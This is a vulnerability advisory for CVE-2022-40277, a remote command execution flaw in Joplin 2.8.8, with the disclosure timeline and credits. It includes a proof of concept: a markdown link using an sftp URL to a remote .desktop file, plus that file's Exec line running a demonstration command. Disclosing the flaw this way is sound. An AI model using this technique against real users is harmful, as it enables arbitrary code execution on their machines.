Joplin 2.8.8 - Remote Command Execution
Summary
Name | Joplin 2.8.8 - Remote Command Execution |
Code name | |
Product | Joplin |
Affected versions | Version 2.8.8 |
State | Public |
Release date | 2022-09-26 |
Vulnerability
Kind | Remote command execution |
Rule | |
Remote | Yes |
CVSSv3.1 Vector | CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H |
CVSSv3.1 Base Score | 7.7 |
Exploit available | Yes |
CVE ID(s) |
Description
Joplin version 2.8.8 allows an external attacker to execute arbitrary commands remotely on any client that opens a link in a malicious markdown file, via Joplin. This is possible because the application does not properly validate the schema/protocol of existing links in the markdown file before passing them to the shell.openExternal function.
Vulnerability
This vulnerability occurs due to improper scheme/protocol validation of external URLs. Here is a small example to give you a better understanding of vulnerability.
Basically what the application is doing is sending to shell.openExternal(url), any url present in the markdown file.
Exploitation requirements
To achieve the RCE, the attacker will abuse certain schemes/protocols. Some of these only work on windows, others on MACos, others only work correctly under certain specific Linux distributions. In my case, I used Xubuntu 20.04 (Xfce) to simulate a victim. I chose this distribution because in its default configuration it executes the payload.desktop file after mounting the remote location where the payload file is located. In other Linux distributions by default these files are not executed once the remote location is mounted.
In the resources section I will provide you with support material so that you can understand in greater depth what I have just explained.
Exploitation
To exploit this vulnerability, you must send the following file to a user to open with Joplin:
exploit.md
[exploit](sftp://user@server/uploads/payload.desktop)
payload.desktop
In the Exec parameter you put the command you want the victim to execute.
[Desktop Entry]
Exec=xmessage "RCE by cbelloatfluid"
Type=Application
Evidence of exploitation
Our security policy
We have reserved the CVE-2022-40277 to refer to this issue from now on.
System Information
-
Version: Joplin 2.8.8
-
Operating System: GNU/Linux - Xubuntu 20.04 (Xfce)
Mitigation
There is currently no patch available for this vulnerability.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://github.com/laurent22/joplin
Timeline
2022-09-07
Vulnerability discovered.
2022-09-08
Vendor contacted.
2022-09-26
Public Disclosure.